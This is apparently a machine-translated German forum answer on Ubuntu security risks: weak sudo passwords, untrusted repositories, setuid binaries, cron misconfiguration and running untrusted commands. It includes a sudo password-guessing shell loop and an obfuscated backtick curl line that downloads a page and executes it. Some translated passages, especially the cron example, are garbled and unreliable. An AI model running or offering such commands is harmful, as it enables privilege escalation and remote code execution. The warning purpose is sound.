Das Knacken des root-Passworts selbst ist nicht möglich, da Ubuntu den root-Benutzer standardmäßig deaktiviert hat. Wenn Ihr Benutzer jedoch durch sudo root werden kann und Ihr Passwort leicht zu erraten ist, haben Sie ein unsicheres System. Beispielskript zum Testen eines Passworts:
#!/bin/sh
for pass in password 123 ubuntu pass; do
echo $pass|sudo -S evil_command
done
Durch Hinzufügen eines nicht vertrauenswürdigen Repositorys können Programme aus diesem Repository installiert werden. Selbst wenn Sie eine Anwendung wie diese nicht explizit installieren sudo apt-get install [app-from-repo], kann das Repository dennoch andere Programme beeinflussen, indem Ubuntu davon ausgeht, dass das Repository eine neuere Version eines bestimmten Programms enthält.
Der Update-Vorgang wird als root ausgeführt, da sonst keine Dateien in /usr/binoder geschrieben werden konnten /etc. Ein Installations-Trigger wird auch als root ausgeführt und kann willkürlich und möglicherweise schädliche Befehle ausführen. Jetzt mach dir keine Sorgen, zum Aktualisieren von Programmen sind manuelle Maßnahmen erforderlich, und die Ubuntu-Repositorys sind sicher. Closed-Source-Software wie Windows kann niemals als vertrauenswürdig eingestuft werden, da die Quelle nicht auf schädlichen Code überprüft werden kann. Sie können jedoch bei Bedarf die Quelle der Ubuntu-Anwendung überprüfen (gilt nicht für proprietäre Programme wie sun-java6oder Flash).
Wie von Javier Rivera erwähnt, können Kernel-Fehler zur Ausführung von willkürlichem Code führen, aber auch fehlerhafte Software kann gefährlich sein, insbesondere fehlerhafte setsuidRoot-Binärdateien (Binärdateien, die unter dem Dateibesitzer root ausgeführt werden) und andere fehlerhafte Programme, die als Root ausgeführt werden.
Sie können Sicherheitslücken in Ihrem System schaffen, wenn Sie nicht darauf achten, was Sie tun. Ohne das Konzept von Cronjobs vollständig zu verstehen, haben Sie beispielsweise einen Cronjob hinzugefügt, /etc/cron.dailyder ein Programm in Ihrem /bin/sh /home/your-username/myscript.shBasisordner ausführt (z . B. kann ein Exploit bösartig sein, wenn die Datei myscript.sh von Ihnen schreibbar ist und von Ihnen gelöscht werden kann Code, in myscript.shdem als root ausgeführt wird (erweiterte Rechte).
Um sicher zu gehen, benutze deinen Verstand! Führen Sie keine Befehle aus nicht vertrauenswürdigen Quellen aus, wenn Sie nicht wissen, was sie bewirken. Wenn jemand sagt, renne `curl 3221233674`mit Back-Ticks, dann nicht. 3221233674 ist eine andere Möglichkeit zum Schreiben 192.0.32.10(IP von example.com). Es wäre also gleich:
`curl http://example.com/`
Diese Back-Ticks bewirken, dass die Ausgabe als Shell-Befehle ausgeführt wird. Im Klartext: "Laden Sie die Seite http://example.com/ herunter und versuchen Sie, die heruntergeladene Seite auszuführen".
Zuerst würden Sie in dem gegebenen Befehl nichts Bösartiges sehen. Aber jetzt wissen Sie, dass es auch missbraucht werden kann.
Überprüfen Sie immer die Befehle / Skripte, die Sie aus nicht vertrauenswürdigen Quellen wie dem Internet erhalten.